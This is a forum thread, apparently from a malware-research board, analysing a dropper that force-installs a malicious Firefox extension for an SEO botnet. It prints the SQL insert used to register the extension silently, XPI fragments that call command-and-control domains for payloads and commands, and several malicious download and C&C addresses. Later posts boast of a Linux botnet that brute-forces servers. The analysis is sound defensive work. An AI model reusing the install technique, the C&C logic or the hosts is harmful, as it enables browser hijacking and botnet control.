[Xylitol]

From the story here: http://krebsonsecurity.com/2013/12/botn ... web-sites/

EXE: https://www.virustotal.com/en/file/19b5 ... 387210257/ > 33/49
XPI: https://www.virustotal.com/en/file/63ea ... 387210244/ > 2/49

Roughly:
The exe will kill your firefox process (if open) and try to get the default path of Mozilla Firefox then load mozsqlite3.dll (SQLite database library of firefox)
If mozsqlite3.dll is not into your firefox folder the malware will look for sqlite3.dll

Looking for firefox.exe process to kill:

Creating the malicious XPI (who's inside the EXE encoded in base64 originally):

Code: Select all

C:\Documents and Settings\Xylibox\Application Data\Mozilla\Firefox\Profiles\a9y0v6sz.default\extensions\advance@windowsclient.com.xpi

Both are searched to retrieve functions and use the parameters of firefox.


Concat a query to register the extension via extensions.sqlite (used to stores data about installed extensions) and execute the query via sqlite3_exec:

Code: Select all

INSERT INTO `addon` (`id`,`syncGUID`,`location`,`version`,`type`,`internalName`,`updateURL`,`updateKey`,`optionsURL`,`optionsType`,`aboutURL`,`iconURL`,`icon64URL`,`defaultLocale`,`visible`,`active`,`userDisabled`,`appDisabled`,`pendingUninstall`,`descriptor`,`installDate`,`updateDate`,`applyBackgroundUpdates`,`bootstrap`,`skinnable`,`size`,`sourceURI`,`releaseNotesURI`,`softDisabled`,`isForeignInstall`,`hasBinaryComponents`,`strictCompatibility`) VALUES ('advance@windowsclient.com','q218hASWjgq','app-profile','0.1','extension','','','','','','','','','29','1','1','0','0','0','C:\Documents and Settings\Xylibox\Application Data\Mozilla\Firefox\Profiles\a9y0v6sz.default\extensions\advance@windowsclient.com.xpi','1359123189894','1359123189894','1','0','0','16880','','','0','0','0','0');

After droping/registering the malicious extension the executable just ZwTerminateProcess.



From the XPI:

Code: Select all

this.linkList='dbnetsoftware.com,nordewdd.com,auditpointm.com,dbsoftnet.com';
let url = "http://"+this.link+"/cme.php";consolMsg(url);
{ payloadLink:"/SIT/pl.php",
    cmdLink:"/SIT/cm.php",

Interesting fact, Kafeine spotted it 6 months ago as payload on a Blackhole Exploit Kit.

XPI Direct link:

Code: Select all

216.250.115.143/develop/script/windowsclient.com.xpi

EXE:

Code: Select all

brehgf.com/bl/fts.exe 
lan2wave.com/161e8fdc56f715bb/161e8fdc56f715bb/z.php?mf=1l:30:33:1o:1g&be=1f:1h:1h:1n:1k:1f:2w:1j:1n:1k&y=1f&hw=y&wb=n 

C&C:

Code: Select all

216.250.115.143/develop/SEO/ADWP/login.php

[grum]

:lol: SEO botnet?

[IceMans]

Regarding the cpanel for that.

if you look here

You have a nice XSS as shown below.

[forty-six]

Xylitol, you should have written Krebs article. :D

[grum]

:lol: SEO botnet use victim is firefox and chrome browser addon real not special, i have src linux botnet scan brute CMS baselist/scan CVE LFI/RFI and inj shell/brute FTP/SSH very powerfull because it's use linux server infected hardware power lolz! browse power bad for multi threat work

[Xylitol]

grum, stop being useless and share intelligence instead of talking, 90% of your posts are garbage.

[grum]

:D thanks Xylitol !

shared some image linux bot control, it's in my private research,havefun




sorry if you think i try spam here!

[patriq]

:D thanks Xylitol !

shared some image linux bot control, it's in my private research,havefun




sorry if you think i try spam here!

how about a binary for this "linux server infected hardware power lolz!" ?

a new thread would prob be best.

[grum]

infected linux server via CVE/shell exploit inj auto/auto exploit root server but bot can working on user mode, support x32/x64 many linux kernel

[bsteo]

grum is a known malware seller and a ripper also (see TF and other forums)